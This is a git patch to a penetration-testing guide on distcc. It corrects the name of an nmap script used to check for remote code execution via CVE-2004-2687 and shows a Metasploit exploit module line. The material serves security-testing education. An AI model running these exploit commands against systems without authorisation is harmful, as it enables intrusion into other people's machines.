From c45f02d0a4465e7ac83fd4f494cf04c2fbd9f1d2 Mon Sep 17 00:00:00 2001 From: Sergio C Date: Sat, 2 Mar 2024 00:18:09 +0100 Subject: [PATCH] Update 3632-pentesting-distcc.md Correction of the script name --- network-services-pentesting/3632-pentesting-distcc.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network-services-pentesting/3632-pentesting-distcc.md b/network-services-pentesting/3632-pentesting-distcc.md index 279153c58..a2f7d33c5 100644 --- a/network-services-pentesting/3632-pentesting-distcc.md +++ b/network-services-pentesting/3632-pentesting-distcc.md @@ -32,7 +32,7 @@ Check if it's vulnerable to **CVE-2004-2687** to execute arbitrary code: ```bash msf5 > use exploit/unix/misc/distcc_exec -nmap -p 3632 --script distcc-exec --script-args="distcc-exec.cmd='id'" +nmap -p 3632 --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'" ``` # Shodan